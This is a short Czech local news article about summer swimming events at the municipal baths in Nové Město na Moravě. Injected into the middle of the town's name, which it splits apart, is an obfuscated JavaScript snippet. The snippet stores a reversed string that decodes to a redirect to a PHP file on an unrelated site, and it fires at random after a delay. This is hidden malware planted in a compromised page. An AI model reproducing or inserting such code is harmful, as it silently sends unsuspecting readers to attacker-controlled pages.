Rainbow page separator

V Městských lázních si mohou zájemci zaplavat i v maskáčích

Středa, 27. července 2016

Novoměstské Městské lázně jsou Stavbou Vysočiny 2015

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Speciální akce pro veřejnost o prázdninách nabízejí v novoměstských Městských lázních. Všechny jsou v ceně běžného vstupného.
Na požádání zájemcům plavčík umožní vyzkoušet si plavání s plaveckou pomůckou, plavání pod vodou, kdy je možné lovit poklad, případně proplavaní mezi překážkami umístěnými pod hladinou. Do letní mimořádné „lázeňské“ nabídky patří také vodní hry s míčem, možnost změření času a také plavání se zátěží. To zahrnuje plavání v oděvu, kdy jsou zájemcům na koupání zapůjčeny originální vojenské maskáče.
Prázdniny využívá rovněž akce nazvaná Cvičení s Lýdou, která probíhá vždy v sobotu od 14, 16 a 18 hodin pro dospělé zájemce a od 16 a 17 hodin pak mohou připravený program v novoměstských lázních využít děti.